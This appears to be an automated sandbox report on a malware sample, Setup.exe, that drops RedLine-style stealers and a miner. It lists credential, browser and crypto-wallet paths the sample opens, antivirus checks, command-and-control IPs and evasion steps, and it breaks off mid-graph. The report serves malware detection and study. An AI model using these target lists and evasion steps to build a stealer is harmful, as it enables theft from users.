Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_wmi.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_bz2.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_lzma.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_socket.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\select.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FC590 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_00007FF7F04FC590
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0516950 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 6_2_00007FF7F0516950
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.mergedALL.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2524237107.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1690804968.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1671099792.0000000000FE2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\mergedALL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: powershell.exe, 00000001.00000002.1844537369.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Yara detected Credential Stealer
Source: Yara match File source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2525381623.0000000003494000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.mergedALL.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2524237107.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1690804968.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1671099792.0000000000FE2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\mergedALL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10306078 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct, 19_2_00007FFE10306078
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10305074 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct, 19_2_00007FFE10305074
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13206078 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct, 48_2_00007FFE13206078
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13205074 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct, 48_2_00007FFE13205074
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E175074 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct, 57_2_00007FFE0E175074
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E176078 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct, 57_2_00007FFE0E176078
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1464883 Sample: Setup.exe Startdate: 30/06/2024 Architecture: WINDOWS Score: 100 131 api.ip.sb 2->131 133 pool.hashvault.pro 2->133 143 Snort IDS alert for network traffic 2->143 145 Multi AV Scanner detection for domain / URL 2->145 147 Found malware configuration 2->147 149 17 other signatures 2->149 11 Setup.exe 6 2->11         started        15 Notepad.exe 2->15         started        17 Notepad.exe 2->17         started        19 3 other processes 2->19 signatures3 process4 file5 113 C:\Users\user\AppData\Local\...\mergedALL.exe, PE32 11->113 dropped 115 C:\Users\user\AppData\Local\...\hamburger.exe, PE32+ 11->115 dropped 117 C:\Users\user\AppData\Local\Temp\fix.exe, PE32 11->117 dropped 125 2 other malicious files 11->125 dropped 175 Found many strings related to Crypto-Wallets (likely being stolen) 11->175 177 Encrypted powershell cmdline option found 11->177 21 Notepad.exe 15 11->21         started        25 fix.exe 11->25         started        28 mergedALL.exe 5 4 11->28         started        38 3 other processes 11->38 127 13 other malicious files 15->127 dropped 30 Notepad.exe 15->30         started        119 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 17->119 dropped 121 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 17->121 dropped 129 11 other malicious files 17->129 dropped 32 Notepad.exe 17->32         started        123 C:\Windows\Temp\trxhxvjzqipl.sys, PE32+ 19->123 dropped 179 Multi AV Scanner detection for dropped file 19->179 181 Modifies the context of a thread in another process (thread injection) 19->181 183 Adds a directory exclusion to Windows Defender 19->183 185 Sample is not signed and drops a device driver 19->185 34 powershell.exe 19->34         started        36 conhost.exe 19->36         started        40 2 other processes 19->40 signatures6 process7 dnsIp8 97 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 21->97 dropped 99 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 21->99 dropped 101 C:\Users\user\AppData\Local\...\python312.dll, PE32+ 21->101 dropped 107 11 other malicious files 21->107 dropped 151 Antivirus detection for dropped file 21->151 153 Multi AV Scanner detection for dropped file 21->153 155 Machine Learning detection for dropped file 21->155 157 Drops PE files to the user root directory 21->157 42 Notepad.exe 21->42         started        135 163.5.160.27, 49732, 49742, 49743 EPITECHFR France 25->135 159 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 25->159 161 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 25->161 163 Tries to harvest and steal browser information (history, passwords, etc) 25->163 45 conhost.exe 25->45         started        137 51.195.206.227, 38719, 49731 OVHFR France 28->137 165 Tries to steal Crypto Currency Wallets 28->165 167 Loading BitLocker PowerShell Module 34->167 47 conhost.exe 34->47         started        139 95.179.241.203, 3333, 49740 AS-CHOOPAUS Netherlands 36->139 103 C:\ProgramData\...\esfowblknspo.exe, PE32+ 38->103 dropped 105 C:\ProgramData\...\tubpxzvwmyfr.exe, PE32+ 38->105 dropped 169 Found many strings related to Crypto-Wallets (likely being stolen) 38->169 171 Adds a directory exclusion to Windows Defender 38->171 49 powershell.exe 23 38->49         started        52 powershell.exe 38->52         started        54 cmd.exe 38->54         started        60 10 